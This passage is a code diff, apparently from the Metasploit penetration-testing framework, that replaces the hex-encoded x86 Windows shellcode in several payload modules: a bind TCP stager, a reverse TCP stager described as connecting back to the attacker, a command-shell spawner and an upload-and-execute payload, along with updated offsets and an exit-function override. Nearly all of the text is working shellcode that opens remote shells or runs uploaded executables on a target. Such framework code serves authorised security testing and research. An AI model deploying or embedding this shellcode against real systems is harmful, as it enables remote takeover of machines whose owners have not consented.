"\xee\x31\xc0\x99\xac\x84\xc0\x74\x07\xc1\xca\x0d" +
|
||||
"\x01\xc2\xeb\xf4\x3b\x54\x24\x28\x75\xe5\x8b\x5f" +
|
||||
"\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb" +
|
||||
"\x03\x2c\x8b\x89\x6c\x24\x1c\x61\xc3\x31\xdb\x64" +
|
||||
"\x8b\x43\x30\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x40" +
|
||||
"\x08\x5e\x68\x8e\x4e\x0e\xec\x50\xff\xd6\x66\x53" +
|
||||
"\x66\x68\x33\x32\x68\x77\x73\x32\x5f\x54\xff\xd0" +
|
||||
"\x68\xcb\xed\xfc\x3b\x50\xff\xd6\x5f\x89\xe5\x66" +
|
||||
"\x81\xed\x08\x02\x55\x6a\x02\xff\xd0\x68\xd9\x09" +
|
||||
"\xf5\xad\x57\xff\xd6\x53\x53\x53\x53\x43\x53\x43" +
|
||||
"\x53\xff\xd0\x68\xff\xff\xff\xff\x66\x68\x11\x5c" +
|
||||
"\x66\x53\x89\xe1\x95\x68\xec\xf9\xaa\x60\x57\xff" +
|
||||
"\xd6\x6a\x10\x51\x55\xff\xd0\x66\x6a\x64\x66\x68" +
|
||||
"\x63\x6d\x6a\x50\x59\x29\xcc\x89\xe7\x6a\x44\x89" +
|
||||
"\xe2\x31\xc0\xf3\xaa\x95\x89\xfd\xfe\x42\x2d\xfe" +
|
||||
"\x42\x2c\x8d\x7a\x38\xab\xab\xab\x68\x72\xfe\xb3" +
|
||||
"\x16\xff\x75\x28\xff\xd6\x5b\x57\x52\x51\x51\x51" +
|
||||
"\x6a\x01\x51\x51\x55\x51\xff\xd0\x68\xad\xd9\x05" +
|
||||
"\xce\x53\xff\xd6\x6a\xff\xff\x37\xff\xd0\x68\xe7" +
|
||||
"\x79\xc6\x79\xff\x75\x04\xff\xd6\xff\x77\xfc\xff" +
|
||||
"\xd0\x68\x7e\xd8\xe2\x73\x53\xff\xd6\xff\xd0"
|
||||
|
||||
'Payload' => "\xFC\xE8\x89\x00\x00\x00\x60\x89\xE5\x31\xD2\x64\x8B\x52\x30\x8B" +
|
||||
"\x52\x0C\x8B\x52\x14\x8B\x72\x28\x0F\xB7\x4A\x26\x31\xFF\x31\xC0" +
|
||||
"\xAC\x3C\x61\x7C\x02\x2C\x20\xC1\xCF\x0D\x01\xC7\xE2\xF0\x52\x57" +
|
||||
"\x8B\x52\x10\x8B\x42\x3C\x01\xD0\x8B\x40\x78\x85\xC0\x74\x4A\x01" +
|
||||
"\xD0\x50\x8B\x48\x18\x8B\x58\x20\x01\xD3\xE3\x3C\x49\x8B\x34\x8B" +
|
||||
"\x01\xD6\x31\xFF\x31\xC0\xAC\xC1\xCF\x0D\x01\xC7\x38\xE0\x75\xF4" +
|
||||
"\x03\x7D\xF8\x3B\x7D\x24\x75\xE2\x58\x8B\x58\x24\x01\xD3\x66\x8B" +
|
||||
"\x0C\x4B\x8B\x58\x1C\x01\xD3\x8B\x04\x8B\x01\xD0\x89\x44\x24\x24" +
|
||||
"\x5B\x5B\x61\x59\x5A\x51\xFF\xE0\x58\x5F\x5A\x8B\x12\xEB\x86\x5D" +
|
||||
"\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5F\x54\x68\x4C\x77\x26\x07" +
|
||||
"\xFF\xD5\xB8\x90\x01\x00\x00\x29\xC4\x54\x50\x68\x29\x80\x6B\x00" +
|
||||
"\xFF\xD5\x50\x50\x50\x50\x40\x50\x40\x50\x68\xEA\x0F\xDF\xE0\xFF" +
|
||||
"\xD5\x89\xC7\x68\x7F\x00\x00\x01\x68\x02\x00\x11\x5C\x89\xE6\x6A" +
|
||||
"\x10\x56\x57\x68\x99\xA5\x74\x61\xFF\xD5\x68\x63\x6D\x64\x00\x89" +
|
||||
"\xE3\x57\x57\x57\x31\xF6\x6A\x12\x59\x56\xE2\xFD\x66\xC7\x44\x24" +
|
||||
"\x3C\x01\x01\x8D\x44\x24\x10\xC6\x00\x44\x54\x50\x56\x56\x56\x46" +
|
||||
"\x56\x4E\x56\x56\x53\x56\x68\x79\xCC\x3F\x86\xFF\xD5\x89\xE0\x4E" +
|
||||
"\x56\x46\xFF\x30\x68\x08\x87\x1D\x60\xFF\xD5\xBB\xE0\x1D\x2A\x0A" +
|
||||
"\x68\xA6\x95\xBD\x9D\xFF\xD5\x3C\x06\x7C\x0A\x80\xFB\xE0\x75\x05" +
|
||||
"\xBB\x47\x13\x72\x6F\x6A\x00\x53\xFF\xD5"
|
||||
}
|
||||
))
|
||||
end
|
||||
|
@ -24,7 +24,7 @@ module Metasploit3
|
||||
'Name' => 'Bind TCP Stager',
|
||||
'Version' => '$Revision$',
|
||||
'Description' => 'Listen for a connection',
|
||||
'Author' => ['hdm', 'skape'],
|
||||
'Author' => ['hdm', 'skape', 'Stephen Fewer <stephen_fewer[at]harmonysecurity[dot]com>'],
|
||||
'License' => MSF_LICENSE,
|
||||
'Platform' => 'win',
|
||||
'Arch' => ARCH_X86,
|
||||
@ -32,34 +32,27 @@ module Metasploit3
|
||||
'Convention' => 'sockedi',
|
||||
'Stager' =>
|
||||
{
|
||||
'Offsets' =>
|
||||
{
|
||||
'LPORT' => [ 276+1, 'n' ],
|
||||
},
|
||||
'Payload' =>
|
||||
"\xfc"+
|
||||
"\xe8\x56\x00\x00\x00\x53\x55\x56\x57\x8b\x6c\x24\x18\x8b\x45\x3c" +
|
||||
"\x8b\x54\x05\x78\x01\xea\x8b\x4a\x18\x8b\x5a\x20\x01\xeb\xe3\x32" +
|
||||
"\x49\x8b\x34\x8b\x01\xee\x31\xff\xfc\x31\xc0\xac\x38\xe0\x74\x07" +
|
||||
"\xc1\xcf\x0d\x01\xc7\xeb\xf2\x3b\x7c\x24\x14\x75\xe1\x8b\x5a\x24" +
|
||||
"\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01\xe8" +
|
||||
"\xeb\x02\x31\xc0\x5f\x5e\x5d\x5b\xc2\x08\x00\x31\xd2\x64\x8b\x52" +
|
||||
"\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x6a\x18\x59\x31\xff\x31" +
|
||||
"\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf0\x81" +
|
||||
"\xff\x5b\xbc\x4a\x6a\x8b\x5a\x10\x8b\x12\x75\xdb\x5e\x53\x68\x8e" +
|
||||
"\x4e\x0e\xec\xff\xd6\x89\xc7\x53\x68\x54\xca\xaf\x91\xff\xd6\x81" +
|
||||
"\xec\x00\x01\x00\x00\x50\x57\x56\x53\x89\xe5\xe8\x27\x00\x00\x00" +
|
||||
"\x90\x01\x00\x00\xb6\x19\x18\xe7\xe7\x79\xc6\x79\xe5\x49\x86\x49" +
|
||||
"\xa4\x1a\x70\xc7\xa4\xad\x2e\xe9\xd9\x09\xf5\xad\xcb\xed\xfc\x3b" +
|
||||
"\x77\x73\x32\x5f\x33\x32\x00\x5b\x8d\x4b\x20\x51\xff\xd7\x89\xdf" +
|
||||
"\x89\xc3\x8d\x75\x14\x6a\x07\x59\x51\x53\xff\x34\x8f\xff\x55\x04" +
|
||||
"\x59\x89\x04\x8e\xe2\xf2\x2b\x27\x54\xff\x37\xff\x55\x30\x31\xc0" +
|
||||
"\x50\x50\x50\x50\x40\x50\x40\x50\xff\x55\x2c\x89\xc7\x31\xdb\x53" +
|
||||
"\x53\x68\x02\x00\x22\x11\x89\xe0\x6a\x10\x50\x57\xff\x55\x24\x53" +
|
||||
"\x57\xff\x55\x28\x53\x54\x57\xff\x55\x20\x53\x57\x89\xc7\xff\x55" +
|
||||
"\x1c\x6a\x40\x5e\x56\xc1\xe6\x06\x56\xc1\xe6\x08\x56\x6a\x00\xff" +
|
||||
"\x55\x0c\x89\xc3\x6a\x00\x68\x00\x10\x00\x00\x53\x57\xff\x55\x18" +
|
||||
"\xff\xd3"
|
||||
'Offsets' => { 'LPORT' => [ 201, 'n' ] },
|
||||
'RequiresMidstager' => false,
|
||||
'Payload' => "\xFC\xE8\x89\x00\x00\x00\x60\x89\xE5\x31\xD2\x64\x8B\x52\x30\x8B" +
|
||||
"\x52\x0C\x8B\x52\x14\x8B\x72\x28\x0F\xB7\x4A\x26\x31\xFF\x31\xC0" +
|
||||
"\xAC\x3C\x61\x7C\x02\x2C\x20\xC1\xCF\x0D\x01\xC7\xE2\xF0\x52\x57" +
|
||||
"\x8B\x52\x10\x8B\x42\x3C\x01\xD0\x8B\x40\x78\x85\xC0\x74\x4A\x01" +
|
||||
"\xD0\x50\x8B\x48\x18\x8B\x58\x20\x01\xD3\xE3\x3C\x49\x8B\x34\x8B" +
|
||||
"\x01\xD6\x31\xFF\x31\xC0\xAC\xC1\xCF\x0D\x01\xC7\x38\xE0\x75\xF4" +
|
||||
"\x03\x7D\xF8\x3B\x7D\x24\x75\xE2\x58\x8B\x58\x24\x01\xD3\x66\x8B" +
|
||||
"\x0C\x4B\x8B\x58\x1C\x01\xD3\x8B\x04\x8B\x01\xD0\x89\x44\x24\x24" +
|
||||
"\x5B\x5B\x61\x59\x5A\x51\xFF\xE0\x58\x5F\x5A\x8B\x12\xEB\x86\x5D" +
|
||||
"\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5F\x54\x68\x4C\x77\x26\x07" +
|
||||
"\xFF\xD5\xB8\x90\x01\x00\x00\x29\xC4\x54\x50\x68\x29\x80\x6B\x00" +
|
||||
"\xFF\xD5\x50\x50\x50\x50\x40\x50\x40\x50\x68\xEA\x0F\xDF\xE0\xFF" +
|
||||
"\xD5\x89\xC7\x31\xDB\x53\x68\x02\x00\x11\x5C\x89\xE6\x6A\x10\x56" +
|
||||
"\x57\x68\xC2\xDB\x37\x67\xFF\xD5\x53\x57\x68\xB7\xE9\x38\xFF\xFF" +
|
||||
"\xD5\x53\x53\x57\x68\x74\xEC\x3B\xE1\xFF\xD5\x57\x89\xC7\x68\x75" +
|
||||
"\x6E\x4D\x61\xFF\xD5\x6A\x00\x6A\x04\x56\x57\x68\x02\xD9\xC8\x5F" +
|
||||
"\xFF\xD5\x8B\x36\x6A\x40\x68\x00\x10\x00\x00\x56\x6A\x00\x68\x58" +
|
||||
"\xA4\x53\xE5\xFF\xD5\x89\xC3\x53\x6A\x00\x56\x53\x57\x68\x02\xD9" +
|
||||
"\xC8\x5F\xFF\xD5\x01\xC3\x29\xC6\x85\xF6\x75\xEC\xC3"
|
||||
}
|
||||
))
|
||||
end
|
||||
|
@ -100,5 +100,18 @@ module Metasploit3
|
||||
# Return the updated payload
|
||||
return p
|
||||
end
|
||||
|
||||
|
||||
# for now we must let this payload use the old EXITFUNC hash values.
|
||||
def replace_var(raw, name, offset, pack)
|
||||
super
|
||||
if( name == 'EXITFUNC' )
|
||||
datastore[name] = 'thread' if not datastore[name]
|
||||
raw[offset, 4] = [ 0x5F048AF0 ].pack(pack || 'V') if datastore[name] == 'seh'
|
||||
raw[offset, 4] = [ 0x60E0CEEF ].pack(pack || 'V') if datastore[name] == 'thread'
|
||||
raw[offset, 4] = [ 0x73E2D87E ].pack(pack || 'V') if datastore[name] == 'process'
|
||||
return true
|
||||
end
|
||||
return false
|
||||
end
|
||||
|
||||
end
|
@ -24,7 +24,7 @@ module Metasploit3
|
||||
'Name' => 'Reverse TCP Stager',
|
||||
'Version' => '$Revision$',
|
||||
'Description' => 'Connect back to the attacker',
|
||||
'Author' => ['hdm', 'skape'],
|
||||
'Author' => ['hdm', 'skape', 'Stephen Fewer <stephen_fewer[at]harmonysecurity[dot]com>'],
|
||||
'License' => MSF_LICENSE,
|
||||
'Platform' => 'win',
|
||||
'Arch' => ARCH_X86,
|
||||
@ -32,32 +32,26 @@ module Metasploit3
|
||||
'Convention' => 'sockedi',
|
||||
'Stager' =>
|
||||
{
|
||||
'Offsets' =>
|
||||
{
|
||||
'LHOST' => [ 263, 'ADDR' ],
|
||||
'LPORT' => [ 270, 'n' ],
|
||||
},
|
||||
'Payload' =>
|
||||
"\xfc\xe8\x56\x00\x00\x00\x53\x55\x56\x57\x8b\x6c\x24\x18\x8b\x45" +
|
||||
"\x3c\x8b\x54\x05\x78\x01\xea\x8b\x4a\x18\x8b\x5a\x20\x01\xeb\xe3" +
|
||||
"\x32\x49\x8b\x34\x8b\x01\xee\x31\xff\xfc\x31\xc0\xac\x38\xe0\x74" +
|
||||
"\x07\xc1\xcf\x0d\x01\xc7\xeb\xf2\x3b\x7c\x24\x14\x75\xe1\x8b\x5a" +
|
||||
"\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01" +
|
||||
"\xe8\xeb\x02\x31\xc0\x5f\x5e\x5d\x5b\xc2\x08\x00\x31\xd2\x64\x8b" +
|
||||
"\x52\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x6a\x18\x59\x31\xff" +
|
||||
"\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf0" +
|
||||
"\x81\xff\x5b\xbc\x4a\x6a\x8b\x5a\x10\x8b\x12\x75\xdb\x5e\x53\x68" +
|
||||
"\x8e\x4e\x0e\xec\xff\xd6\x89\xc7\x53\x68\x54\xca\xaf\x91\xff\xd6" +
|
||||
"\x81\xec\x00\x01\x00\x00\x50\x57\x56\x53\x89\xe5\xe8\x1f\x00\x00" +
|
||||
"\x00\x90\x01\x00\x00\xb6\x19\x18\xe7\xa4\x19\x70\xe9\xec\xf9\xaa" +
|
||||
"\x60\xd9\x09\xf5\xad\xcb\xed\xfc\x3b\x57\x53\x32\x5f\x33\x32\x00" +
|
||||
"\x5b\x8d\x4b\x18\x51\xff\xd7\x89\xdf\x89\xc3\x8d\x75\x14\x6a\x05" +
|
||||
"\x59\x51\x53\xff\x34\x8f\xff\x55\x04\x59\x89\x04\x8e\xe2\xf2\x2b" +
|
||||
"\x27\x54\xff\x37\xff\x55\x28\x31\xc0\x50\x50\x50\x50\x40\x50\x40" +
|
||||
"\x50\xff\x55\x24\x89\xc7\x68\x7f\x00\x00\x01\x68\x02\x00\x22\x11" +
|
||||
"\x89\xe1\x6a\x10\x51\x57\xff\x55\x20\x6a\x40\x5e\x56\xc1\xe6\x06" +
|
||||
"\x56\xc1\xe6\x08\x56\x6a\x00\xff\x55\x0c\x89\xc3\x6a\x00\x56\x53" +
|
||||
"\x57\xff\x55\x18\xff\xd3"
|
||||
'Offsets' => { 'LHOST' => [ 196, 'ADDR' ], 'LPORT' => [ 203, 'n' ], },
|
||||
'RequiresMidstager' => false,
|
||||
'Payload' => "\xFC\xE8\x89\x00\x00\x00\x60\x89\xE5\x31\xD2\x64\x8B\x52\x30\x8B" +
|
||||
"\x52\x0C\x8B\x52\x14\x8B\x72\x28\x0F\xB7\x4A\x26\x31\xFF\x31\xC0" +
|
||||
"\xAC\x3C\x61\x7C\x02\x2C\x20\xC1\xCF\x0D\x01\xC7\xE2\xF0\x52\x57" +
|
||||
"\x8B\x52\x10\x8B\x42\x3C\x01\xD0\x8B\x40\x78\x85\xC0\x74\x4A\x01" +
|
||||
"\xD0\x50\x8B\x48\x18\x8B\x58\x20\x01\xD3\xE3\x3C\x49\x8B\x34\x8B" +
|
||||
"\x01\xD6\x31\xFF\x31\xC0\xAC\xC1\xCF\x0D\x01\xC7\x38\xE0\x75\xF4" +
|
||||
"\x03\x7D\xF8\x3B\x7D\x24\x75\xE2\x58\x8B\x58\x24\x01\xD3\x66\x8B" +
|
||||
"\x0C\x4B\x8B\x58\x1C\x01\xD3\x8B\x04\x8B\x01\xD0\x89\x44\x24\x24" +
|
||||
"\x5B\x5B\x61\x59\x5A\x51\xFF\xE0\x58\x5F\x5A\x8B\x12\xEB\x86\x5D" +
|
||||
"\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5F\x54\x68\x4C\x77\x26\x07" +
|
||||
"\xFF\xD5\xB8\x90\x01\x00\x00\x29\xC4\x54\x50\x68\x29\x80\x6B\x00" +
|
||||
"\xFF\xD5\x50\x50\x50\x50\x40\x50\x40\x50\x68\xEA\x0F\xDF\xE0\xFF" +
|
||||
"\xD5\x89\xC7\x68\x7F\x00\x00\x01\x68\x02\x00\x11\x5C\x89\xE6\x6A" +
|
||||
"\x10\x56\x57\x68\x99\xA5\x74\x61\xFF\xD5\x6A\x00\x6A\x04\x56\x57" +
|
||||
"\x68\x02\xD9\xC8\x5F\xFF\xD5\x8B\x36\x6A\x40\x68\x00\x10\x00\x00" +
|
||||
"\x56\x6A\x00\x68\x58\xA4\x53\xE5\xFF\xD5\x89\xC3\x53\x6A\x00\x56" +
|
||||
"\x53\x57\x68\x02\xD9\xC8\x5F\xFF\xD5\x01\xC3\x29\xC6\x85\xF6\x75" +
|
||||
"\xEC\xC3"
|
||||
}
|
||||
))
|
||||
end
|
||||
|
@ -22,7 +22,7 @@ module Metasploit3
|
||||
'Name' => 'Windows Command Shell',
|
||||
'Version' => '$Revision$',
|
||||
'Description' => 'Spawn a piped command shell',
|
||||
'Author' => 'spoonm',
|
||||
'Author' => [ 'spoonm', 'Stephen Fewer <stephen_fewer[at]harmonysecurity[dot]com>' ],
|
||||
'License' => MSF_LICENSE,
|
||||
'Platform' => 'win',
|
||||
'Arch' => ARCH_X86,
|
||||
@ -35,39 +35,23 @@ module Metasploit3
|
||||
{
|
||||
'Offsets' =>
|
||||
{
|
||||
'EXITFUNC' => [ 443, 'V' ]
|
||||
'EXITFUNC' => [ 210, 'V' ]
|
||||
},
|
||||
'Payload' =>
|
||||
"\x68\x33\x32\x00\x00\x68\x57\x53\x32\x5f\x57\xfc\xe8\x4c\x00\x00"+
|
||||
"\x00\x60\x8b\x6c\x24\x28\x8b\x45\x3c\x8b\x7c\x05\x78\x01\xef\x8b"+
|
||||
"\x4f\x18\x8b\x5f\x20\x01\xeb\xe3\x30\x49\x8b\x34\x8b\x01\xee\x31"+
|
||||
"\xc0\x99\xac\x84\xc0\x74\x07\xc1\xca\x0d\x01\xc2\xeb\xf4\x3b\x54"+
|
||||
"\x24\x24\x75\xe3\x8b\x5f\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5f\x1c"+
|
||||
"\x01\xeb\x03\x2c\x8b\x89\x6c\x24\x1c\x61\xc2\x08\x00\x6a\x30\x59"+
|
||||
"\x64\x8b\x31\x8b\x76\x0c\x8b\x76\x1c\xad\x8b\x58\x08\x5e\x53\x68"+
|
||||
"\x8e\x4e\x0e\xec\xff\xd6\x97\x53\x56\x57\x8d\x44\x24\x10\x50\xff"+
|
||||
"\xd7\x50\x50\x50\x68\xb6\x19\x18\xe7\xff\xd6\x97\x68\xa4\x19\x70"+
|
||||
"\xe9\xff\xd6\x95\x68\x08\x92\xe2\xed\xff\xd6\x50\x57\x55\x83\xec"+
|
||||
"\x10\x89\xe5\x89\xee\x6a\x01\x6a\x00\x6a\x0c\x89\xe1\x6a\x00\x51"+
|
||||
"\x56\xad\x56\x53\x68\x80\x8f\x0c\x17\xff\x55\x20\x89\xc7\xff\xd0"+
|
||||
"\x89\xe0\x6a\x00\x50\x8d\x75\x08\x56\x8d\x75\x0c\x56\xff\xd7\x68"+
|
||||
"\x43\x4d\x44\x00\x89\xe2\x31\xc0\x8d\x7a\xac\x6a\x15\x59\xf3\xab"+
|
||||
"\x83\xec\x54\xc6\x42\xbc\x44\x66\xc7\x42\xe8\x01\x01\x8b\x75\x08"+
|
||||
"\x89\x72\xfc\x89\x72\xf8\x8b\x75\x04\x89\x72\xf4\x8d\x42\xbc\x54"+
|
||||
"\x50\x51\x51\x51\x41\x51\x49\x51\x51\x52\x51\x53\x68\x72\xfe\xb3"+
|
||||
"\x16\xff\x55\x20\xff\xd0\x31\xc0\xb4\x04\x96\x29\xf4\x89\xe7\x6a"+
|
||||
"\x64\x53\x68\xb0\x49\x2d\xdb\xff\x55\x20\xff\xd0\x31\xc0\x50\x57"+
|
||||
"\x50\x50\x50\xff\x75\x0c\x53\x68\x11\xc4\x07\xb4\xff\x55\x20\xff"+
|
||||
"\xd0\x85\xc0\x74\x74\x31\xc0\x3b\x07\x74\x36\xe8\x77\x00\x00\x00"+
|
||||
"\x50\x89\xe1\x50\x51\x56\x57\xff\x75\x0c\x53\x68\x16\x65\xfa\x10"+
|
||||
"\xff\x55\x20\xff\xd0\x85\xc0\x74\x50\x31\xc0\x59\x39\xc8\x74\x11"+
|
||||
"\x50\x51\x57\xff\x75\x28\xff\x55\x10\x31\xc9\x39\xc8\x7c\x3a\xeb"+
|
||||
"\xab\x89\xe0\xe8\x3f\x00\x00\x00\x31\xc0\x50\x56\x57\xff\x75\x28"+
|
||||
"\xff\x55\x14\x31\xc9\x39\xc8\x7c\x86\x74\x1e\x51\x89\xe2\x51\x52"+
|
||||
"\x50\x57\xff\x75\x00\x53\x68\x1f\x79\x0a\xe8\xff\x55\x20\xff\xd0"+
|
||||
"\x85\xc0\x74\x05\x31\xc0\x59\xeb\xc8\x53\x68\x7e\xd8\xe2\x73\xff"+
|
||||
"\x55\x20\x31\xc9\x51\xff\xd0\x50\x54\x68\x7e\x66\x04\x80\xff\x75"+
|
||||
"\x28\xff\x55\x18\x85\xc0\x58\x75\xe0\xc3"
|
||||
'Payload' => "\xFC\xE8\x89\x00\x00\x00\x60\x89\xE5\x31\xD2\x64\x8B\x52\x30\x8B" +
|
||||
"\x52\x0C\x8B\x52\x14\x8B\x72\x28\x0F\xB7\x4A\x26\x31\xFF\x31\xC0" +
|
||||
"\xAC\x3C\x61\x7C\x02\x2C\x20\xC1\xCF\x0D\x01\xC7\xE2\xF0\x52\x57" +
|
||||
"\x8B\x52\x10\x8B\x42\x3C\x01\xD0\x8B\x40\x78\x85\xC0\x74\x4A\x01" +
|
||||
"\xD0\x50\x8B\x48\x18\x8B\x58\x20\x01\xD3\xE3\x3C\x49\x8B\x34\x8B" +
|
||||
"\x01\xD6\x31\xFF\x31\xC0\xAC\xC1\xCF\x0D\x01\xC7\x38\xE0\x75\xF4" +
|
||||
"\x03\x7D\xF8\x3B\x7D\x24\x75\xE2\x58\x8B\x58\x24\x01\xD3\x66\x8B" +
|
||||
"\x0C\x4B\x8B\x58\x1C\x01\xD3\x8B\x04\x8B\x01\xD0\x89\x44\x24\x24" +
|
||||
"\x5B\x5B\x61\x59\x5A\x51\xFF\xE0\x58\x5F\x5A\x8B\x12\xEB\x86\x5D" +
|
||||
"\x68\x63\x6D\x64\x00\x89\xE3\x57\x57\x57\x31\xF6\x6A\x12\x59\x56" +
|
||||
"\xE2\xFD\x66\xC7\x44\x24\x3C\x01\x01\x8D\x44\x24\x10\xC6\x00\x44" +
|
||||
"\x54\x50\x56\x56\x56\x46\x56\x4E\x56\x56\x53\x56\x68\x79\xCC\x3F" +
|
||||
"\x86\xFF\xD5\x89\xE0\x4E\x56\x46\xFF\x30\x68\x08\x87\x1D\x60\xFF" +
|
||||
"\xD5\xBB\xE0\x1D\x2A\x0A\x68\xA6\x95\xBD\x9D\xFF\xD5\x3C\x06\x7C" +
|
||||
"\x0A\x80\xFB\xE0\x75\x05\xBB\x47\x13\x72\x6F\x6A\x00\x53\xFF\xD5"
|
||||
}
|
||||
))
|
||||
end
|
||||
|
@ -22,7 +22,7 @@ module Metasploit3
|
||||
'Name' => 'Windows Upload/Execute',
|
||||
'Version' => '$Revision$',
|
||||
'Description' => 'Uploads an executable and runs it',
|
||||
'Author' => 'vlad902',
|
||||
'Author' => ['vlad902', 'Stephen Fewer <stephen_fewer[at]harmonysecurity[dot]com>' ],
|
||||
'License' => MSF_LICENSE,
|
||||
'Platform' => 'win',
|
||||
'Arch' => ARCH_X86,
|
||||
@ -31,34 +31,33 @@ module Metasploit3
|
||||
{
|
||||
'Offsets' =>
|
||||
{
|
||||
'EXITFUNC' => [ 385, 'V' ]
|
||||
'EXITFUNC' => [ 368, 'V' ]
|
||||
},
|
||||
'Payload' =>
|
||||
"\x81\xec\x40\x00\x00\x00\xfc\x89\xfb\xe8\x48\x00\x00\x00\x60\x8b" +
|
||||
"\x6c\x24\x24\x8b\x45\x3c\x8b\x7c\x05\x78\x01\xef\x8b\x4f\x18\x8b" +
|
||||
"\x5f\x20\x01\xeb\x49\x8b\x34\x8b\x01\xee\x31\xc0\x99\xac\x84\xc0" +
|
||||
"\x74\x07\xc1\xca\x0d\x01\xc2\xeb\xf4\x3b\x54\x24\x28\x75\xe5\x8b" +
|
||||
"\x5f\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x03\x2c\x8b" +
|
||||
"\x89\x6c\x24\x1c\x61\xc3\x64\xa1\x30\x00\x00\x00\x8b\x40\x0c\x8b" +
|
||||
"\x70\x1c\xad\x8b\x40\x08\x50\x89\xe6\x68\x8e\x4e\x0e\xec\xff\x36" +
|
||||
"\xff\x56\x04\x66\x68\x00\x00\x66\x68\x33\x32\x68\x77\x73\x32\x5f" +
|
||||
"\x89\xe5\x55\xff\xd0\x89\x46\x08\x68\xb6\x19\x18\xe7\xff\x76\x08" +
|
||||
"\xff\x56\x04\x89\x46\x0c\x6a\x00\x6a\x04\x55\x53\xff\x56\x0c\x8b" +
|
||||
"\x7d\x00\xe8\x0b\x00\x00\x00\x43\x3a\x5c\x74\x6d\x70\x2e\x65\x78" +
|
||||
"\x65\x00\x58\x89\x46\x10\x68\xa5\x17\x00\x7c\xff\x36\xff\x56\x04" +
|
||||
"\x6a\x00\x6a\x06\x6a\x04\x6a\x00\x6a\x07\x68\x00\x00\x00\xe0\xff" +
|
||||
"\x76\x10\xff\xd0\x89\x46\x14\x81\xec\x04\x08\x00\x00\x89\xe5\x68" +
|
||||
"\x1f\x79\x0a\xe8\xff\x36\xff\x56\x04\x89\x46\x18\x6a\x00\x68\x00" +
|
||||
"\x08\x00\x00\x55\x53\xff\x56\x0c\x29\xc7\x50\x89\xe1\x6a\x00\x51" +
|
||||
"\x50\x55\xff\x76\x14\xff\x56\x18\x58\x85\xff\x75\xdf\x68\xfb\x97" +
|
||||
"\xfd\x0f\xff\x36\xff\x56\x04\xff\x76\x14\xff\xd0\x6a\x50\x59\x29" +
|
||||
"\xcc\x89\xe7\x6a\x44\x89\xe2\x31\xc0\xf3\xaa\xfe\x42\x2d\xfe\x42" +
|
||||
"\x2c\x93\x8d\x7a\x38\xab\xab\xab\x68\x72\xfe\xb3\x16\xff\x36\xff" +
|
||||
"\x56\x04\x57\x52\x51\x51\x51\x6a\x01\x51\x51\xff\x76\x10\x51\xff" +
|
||||
"\xd0\x68\xad\xd9\x05\xce\xff\x36\xff\x56\x04\x6a\xff\xff\x37\xff" +
|
||||
"\xd0\x68\x25\xb0\xff\xc2\xff\x36\xff\x56\x04\xff\x76\x10\xff\xd0" +
|
||||
"\x68\xe7\x79\xc6\x79\xff\x76\x08\xff\x56\x04\xff\x77\xfc\xff\xd0" +
|
||||
"\x68\x7e\xd8\xe2\x73\xff\x36\xff\x56\x04\xff\xd0"
|
||||
'Payload' => "\xFC\xE8\x89\x00\x00\x00\x60\x89\xE5\x31\xD2\x64\x8B\x52\x30\x8B" +
|
||||
"\x52\x0C\x8B\x52\x14\x8B\x72\x28\x0F\xB7\x4A\x26\x31\xFF\x31\xC0" +
|
||||
"\xAC\x3C\x61\x7C\x02\x2C\x20\xC1\xCF\x0D\x01\xC7\xE2\xF0\x52\x57" +
|
||||
"\x8B\x52\x10\x8B\x42\x3C\x01\xD0\x8B\x40\x78\x85\xC0\x74\x4A\x01" +
|
||||
"\xD0\x50\x8B\x48\x18\x8B\x58\x20\x01\xD3\xE3\x3C\x49\x8B\x34\x8B" +
|
||||
"\x01\xD6\x31\xFF\x31\xC0\xAC\xC1\xCF\x0D\x01\xC7\x38\xE0\x75\xF4" +
|
||||
"\x03\x7D\xF8\x3B\x7D\x24\x75\xE2\x58\x8B\x58\x24\x01\xD3\x66\x8B" +
|
||||
"\x0C\x4B\x8B\x58\x1C\x01\xD3\x8B\x04\x8B\x01\xD0\x89\x44\x24\x24" +
|
||||
"\x5B\x5B\x61\x59\x5A\x51\xFF\xE0\x58\x5F\x5A\x8B\x12\xEB\x86\x5D" +
|
||||
"\x6A\x7F\x58\xC1\xE0\x03\x29\xC4\x54\x50\x68\x30\xF3\x49\xE4\xFF" +
|
||||
"\xD5\x8D\x04\x04\xC7\x00\x73\x76\x63\x2E\xC7\x40\x04\x65\x78\x65" +
|
||||
"\x00\x89\xE0\x50\x6A\x00\x6A\x06\x6A\x02\x6A\x00\x6A\x07\x68\x00" +
|
||||
"\x00\x00\xE0\x50\x68\xDA\xF6\xDA\x4F\xFF\xD5\x89\xC3\x54\x89\xE6" +
|
||||
"\x6A\x00\x6A\x04\x56\x57\x68\x02\xD9\xC8\x5F\xFF\xD5\x8B\x36\x6A" +
|
||||
"\x04\x68\x00\x10\x00\x00\x56\x6A\x00\x68\x58\xA4\x53\xE5\xFF\xD5" +
|
||||
"\x53\x53\x89\xE1\x6A\x00\x51\x56\x50\x53\x89\xC3\x6A\x00\x56\x53" +
|
||||
"\x57\x68\x02\xD9\xC8\x5F\xFF\xD5\x01\xC3\x29\xC6\x85\xF6\x75\xEC" +
|
||||
"\x68\x2D\x57\xAE\x5B\xFF\xD5\x59\x68\xC6\x96\x87\x52\xFF\xD5\x57" +
|
||||
"\x57\x57\x31\xF6\x6A\x12\x59\x56\xE2\xFD\x66\xC7\x44\x24\x3C\x01" +
|
||||
"\x01\x8D\x44\x24\x10\xC6\x00\x44\x54\x50\x56\x56\x56\x46\x56\x4E" +
|
||||
"\x56\x56\xFF\x74\x24\x78\x56\x68\x79\xCC\x3F\x86\xFF\xD5\x89\xE0" +
|
||||
